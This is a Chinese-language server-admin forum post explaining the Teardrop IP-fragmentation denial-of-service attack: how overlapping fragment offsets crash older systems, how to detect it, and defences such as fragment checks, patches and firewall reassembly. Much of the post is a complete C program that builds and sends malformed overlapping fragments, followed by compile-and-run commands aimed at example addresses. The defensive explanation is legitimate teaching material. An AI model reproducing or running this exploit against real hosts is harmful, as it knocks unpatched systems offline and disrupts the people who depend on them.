服务器大本营

 找回密码
 我要入营

微信扫码 , 快速开始

QQ登录

只需一步,快速开始

查看: 94|回复: 0

Teardrop攻击属于什么攻击?Teardrop攻击怎么防御?

[复制链接]

4万

敬重

700

主题

207

精华

管理员

积分
7969

启航之章进阶之印里程之碑突破之证飞跃之星蜕变之勋卓越之路龙年行大运

QQ
发表于 2024-11-8 20:03:06 | 显示全部楼层 |阅读模式

我要入营,结交更多好友,开启更多功能,轻松玩转服务器大本营!

您需要 登录 才可以下载或查看,没有账号?我要入营

x
Teardrop攻击是一种拒绝服务攻击,是一种基于UDP的病态分片数据包的攻击方法,英文“Tear”是“眼泪”的意思,“drop”是“掉落”的意思,顾名思义,Teardrop攻击是一种令人落泪的攻击手段,可见其破坏威力很强大

主要针对早期微软操作系统(95、98、3.x、nt)近些年有人发现对 2.x 版本的安卓系统、6.0 IOS 系统攻击有效

攻击效果
被攻击计算机会出现蓝屏、重启、卡死等情况

1、Teardrop攻击原理
Teardrop攻击工作原理是攻击者A给受害者B发送一些分片IP报文,并且故意将“13位分片偏移”字段设置成错误的值(既可与上一分片数据重叠,也可错开),B在组合这种含有重叠偏移的伪造分片报文时,某些操作系统收到含有重叠偏移的伪造分片数据包时将会出现系统崩溃、重启等现象。

Teardrop攻击属于什么攻击?Teardrop攻击怎么防御?

Teardrop攻击属于什么攻击?Teardrop攻击怎么防御?


利用UDP包重组时重叠偏移(假设数据包中第二片IP包的偏移量小于第一片结束的位移,而且算上第二片IP包的Data,也未超过第一片的尾部,这就是重叠现象。)的漏洞对系统主机发动拒绝服务攻击,最终导致主机宕机;对于Windows系统会导致蓝屏死机,并显示STOP 0x0000000A错误。

2、检测方法
对接收到的分片数据包进行分析,计算数据包的片偏移量(Offset)是否有误。

3、Teardrop攻击防御方法
网络安全设备将接收到的分片报文先放入缓存中,并根据源IP地址和目的IP地址对报文进行分组,源IP地址和目的IP地址均相同的报文归入同一组,然后对每组IP报文的相关分片信息进行检查,丢弃分片信息存在错误的报文。为了防止缓存溢出,当缓存快要存满时,直接丢弃后续分片报文。

反攻击方法:添加系统补丁程序,丢弃收到的病态分片数据包并对这种攻击进行审计。尽可能采用最新的操作系统,或者在防火墙上设置分段重组功能,由防火墙先接收到同一原包中的所有拆分数据包,然后完成重组工作,而不是直接转发。因为防火墙上可以设置当出现重叠字段时所采用的规则

Teardrop攻击属于什么攻击?Teardrop攻击怎么防御?

Teardrop攻击属于什么攻击?Teardrop攻击怎么防御?


MAC头(帧头):14个字节,包括目标mac6字节,源mac6字节,上层协议2字节
FCS:帧校验序列,4个字节ip头:源ip和目标ip,20字节

Ping大包,比较正常分段与teardrop攻击流量的区别
  1. ping -l 4000 192.168.199.158
复制代码

针对早期Windows系统SMB协议的攻击
teardrop_smb.py

针对Android.IOS 系统的攻击
teardrop_androidios.py

攻击向量并不确定,要视具体协议分析

4、攻击目标
泪滴攻击是一种拒绝服务(DoS)攻击,涉及将碎片数据包发送到目标机器。由于接收这些数据包的机器由于TCP / IP碎片重组错误而无法重新组装,因此数据包相互重叠,导致目标网络设备崩溃。这通常发生在较早的操作系统上,例如Windows 3.1x,Windows 95,Windows NT和2.1.63之前版本的Linux内核。

IP报头中的一个字段是“片段偏移量”字段,指示包含在分段数据包中的数据相对于原始数据包中的数据的起始位置或偏移量。如果一个分片数据包的偏移量和大小之和不同于下一个分片数据包的偏移量和大小之和,则数据包重叠。发生这种情况时,易受泪滴攻击的服务器无法重新组装数据包 ,从而导致拒绝服务状况。

5、编写Teardrop程序(创建一个虚假的IP数据包)
1)、在 Ubuntu 系统下,创建一个 Teardrop.c 文件,写入如下内容:
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <unistd.h>
  4. #include <string.h>
  5. #include <netdb.h>
  6. #include <netinet/in.h>
  7. #include <netinet/udp.h>
  8. #include <arpa/inet.h>
  9. #include <sys/types.h>
  10. #include <sys/time.h>
  11. #include <sys/socket.h>
  12. #include <errno.h>

  13. #ifdef STRANGE_BSD_BYTE_ORDERING_THING
  14. /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
  15. #define FIX(n)  (n)
  16. #else
  17. /* OpenBSD 2.1, all Linux */
  18. #define FIX(n)  htons(n)
  19. #endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

  20. #define IP_MF 0x2000  /* More IP fragment en route */
  21. #define IPH 0x14    /* IP header size */
  22. #define UDPH 0x8     /* UDP header size */
  23. #define PADDING  0x1c    /* datagram frame padding for first packet */
  24. #define MAGIC  0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
  25. #define COUNT 0x1      /* Linux dies with 1, NT is more stalwart and can
  26.                         * withstand maybe 5 or 10 sometimes...  Experiment.*/

  27. void usage(u_char *);
  28. u_long name_resolve(u_char *);
  29. void send_frags(int, u_long, u_long, u_short, u_short);

  30. int main(int argc, char **argv)
  31. {
  32.     int one = 1, count = 0, i, rip_sock;
  33.     // 定义源地址和目的地址
  34.     u_long src_ip = 0, dst_ip = 0;
  35.     // 定义源端口和目的端口
  36.     u_short src_prt = 0, dst_prt = 0;
  37.     // 定义一个32位的IPv4地址
  38.     struct in_addr addr;
  39.     printf("teardrop route|daemon9\n\n");
  40.     //创建原始套接字
  41.     if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
  42.     {
  43.         fprintf(stderr, "raw socket");
  44.         exit(1);
  45.     }
  46.     //设置套接字选项IP_HDRINCL
  47.     if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL,
  48.     (char *)&one, sizeof(one))< 0)
  49.     {
  50.         fprintf(stderr, "IP_HDRINCL");
  51.         exit(1);
  52.     }
  53.     if (argc < 3)
  54.         usage(argv[0]);
  55.     // 设置源IP 和 目的IP
  56.     if(!(src_ip=name_resolve(argv[1]))||!(dst_ip = name_resolve(argv[2])))
  57.     {
  58.         fprintf(stderr, "What the hell kind of IP address is that?\n");
  59.         exit(1);
  60.     }
  61.     while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
  62.     {
  63.         switch (i)
  64.         {
  65.             case 's': // source port (should be emphemeral)
  66.             src_prt = (u_short)atoi(optarg);
  67.             break;
  68.             case 't': // dest port (DNS, anyone?)
  69.             dst_prt = (u_short)atoi(optarg);
  70.             break;
  71.             case 'n': // number to send
  72.             count = atoi(optarg);
  73.             break;
  74.             default :
  75.             usage(argv[0]);
  76.             break; // NOTREACHED
  77.         }
  78.     }
  79.     srandom((unsigned)(utimes("0",(time_t)0)));
  80.     if (!src_prt) src_prt = (random() % 0xffff);
  81.     if (!dst_prt) dst_prt = (random() % 0xffff);
  82.     if (!count)
  83.     count = COUNT;
  84.     printf("Death on flaxen wings:\n");
  85.     addr.s_addr = src_ip;
  86.     printf("From: %15s.%5d\n", inet_ntoa(addr), src_prt);
  87.     addr.s_addr = dst_ip;
  88.     printf(" To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
  89.     printf(" Amt: %5d\n", count);
  90.     printf("[\n ");
  91.     for (i = 0; i < count; i++)
  92.     {
  93.         send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
  94.         // printf("b00m ");
  95.         usleep(500);
  96.     }
  97.     printf("]\n");
  98.     return (0);
  99. }

  100. // 设置 IP 包的内容
  101. void send_frags(int sock, u_long src_ip, u_long dst_ip,u_short src_prt,u_short dst_prt)
  102. {
  103.     u_char *packet = NULL, *p_ptr = NULL, *flag = NULL; // packet pointers
  104.     u_char byte; // a byte
  105.     // 套接字地址结构
  106.     struct sockaddr_in sin; /* socket protocol structure */
  107.     sin.sin_family = AF_INET;
  108.     sin.sin_port = src_prt;
  109.     sin.sin_addr.s_addr = dst_ip;
  110.     packet = (u_char *)malloc(IPH + UDPH + PADDING);
  111.     p_ptr = packet;
  112.     flag = packet;
  113.     bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
  114.     // IP version and header length
  115.     byte = 0x45;
  116.     memcpy(p_ptr, &byte, sizeof(u_char));
  117.     p_ptr += 2; // IP TOS (skipped)
  118.     // total length
  119.     *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);
  120.     p_ptr += 2;
  121.     *((u_short *)p_ptr) = htons(242); // IP id
  122.     p_ptr += 2;
  123.     //IP frag flags and offset
  124.     *((u_short *)p_ptr) |= FIX(IP_MF);
  125.     p_ptr += 2;
  126.     *((u_short *)p_ptr) = 0x40; // IP TTL
  127.     byte = IPPROTO_UDP;
  128.     memcpy(p_ptr + 1, &byte, sizeof(u_char));
  129.     // IP checksum filled in by kernel
  130.     p_ptr += 4;
  131.     // IP source address
  132.     *((u_long *)p_ptr) = src_ip;
  133.     p_ptr += 4;
  134.     // IP destination address
  135.     *((u_long *)p_ptr) = dst_ip;
  136.     p_ptr += 4;
  137.     *((u_short *)p_ptr) = htons(src_prt); // UDP source port
  138.     p_ptr += 2;
  139.     *((u_short *)p_ptr) = htons(dst_prt); // UDP destination port
  140.     p_ptr += 2;
  141.     *((u_short *)p_ptr) = htons(PADDING); // UDP total length
  142.     p_ptr += 4;

  143.     // 发送数据:Fake News
  144.     *((u_short *)p_ptr) = 0x46;
  145.     p_ptr++;
  146.     *((u_short *)p_ptr) = 0x61;
  147.     p_ptr++;
  148.     *((u_short *)p_ptr) = 0x6B;
  149.     p_ptr++;
  150.     *((u_short *)p_ptr) = 0x65;
  151.     p_ptr++;
  152.     *((u_short *)p_ptr) = 0x20;
  153.     p_ptr++;
  154.     *((u_short *)p_ptr) = 0x4E;
  155.     p_ptr++;
  156.     *((u_short *)p_ptr) = 0x65;
  157.     p_ptr++;
  158.     *((u_short *)p_ptr) = 0x77;
  159.     p_ptr++;
  160.     *((u_short *)p_ptr) = 0x73;

  161.     int i=1;
  162.     while(i <= 56)
  163.     {
  164.         printf("%x\t",*flag);
  165.         flag++;
  166.         if(0 == i%8)
  167.             printf("\n");
  168.         i++;
  169.     }

  170.     if (sendto(sock, packet, IPH + UDPH + PADDING, 0,
  171.     (struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
  172.     {
  173.         fprintf(stderr, "\nsendto");
  174.         free(packet);
  175.         exit(1);
  176.     }
  177.     // IP total length is 2 bytes into the header
  178.     p_ptr = &packet[2];
  179.     *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
  180.     // IP offset is 6 bytes into the header
  181.     p_ptr += 4;
  182.     *((u_short *)p_ptr) = FIX(MAGIC);
  183.     if (sendto(sock, packet, IPH+MAGIC+1, 0,
  184.     (struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
  185.     {
  186.         fprintf(stderr, "\nsendto");
  187.         free(packet);
  188.         exit(1);
  189.     }
  190.     free(packet);
  191. }

  192. // 获取主机信息
  193. u_long name_resolve(u_char *host_name)
  194. {
  195.     struct in_addr addr;
  196.     struct hostent *host_ent;
  197.     if ((addr.s_addr = inet_addr(host_name)) == -1)
  198.     {
  199.         if (!(host_ent = gethostbyname(host_name))) return (0);
  200.             bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
  201.     }
  202.     return (addr.s_addr);
  203. }

  204. void usage(u_char *name)
  205. {
  206.     fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",name);
  207.     exit(0);
  208. }
复制代码

2)编译运行
  1. gcc Teardrop.c -o Teardrop
  2. sudo ./Teardrop 100.100.100.100 200.200.200.200
复制代码

Teardrop攻击属于什么攻击?Teardrop攻击怎么防御?

Teardrop攻击属于什么攻击?Teardrop攻击怎么防御?


3)用 wireshark 抓包如下:

Teardrop攻击属于什么攻击?Teardrop攻击怎么防御?

Teardrop攻击属于什么攻击?Teardrop攻击怎么防御?


感谢您的阅读,服务器大本营-技术文章内容集合站,助您成为更专业的服务器管理员!
一入IDC深似海,从此你我是良人!
您需要登录后才可以回帖 登录 | 我要入营

本版积分规则

Loading...

QQ|Archiver|手机版|网站地图|服务器大本营 ( 赣ICP备2021009089号 )

GMT+8, 2024-11-21 17:12 , Processed in 0.084232 second(s), 28 queries , Gzip On.

Powered by 服务器大本营

© 2021-2023 联系飞飞

快速回复 返回顶部 返回列表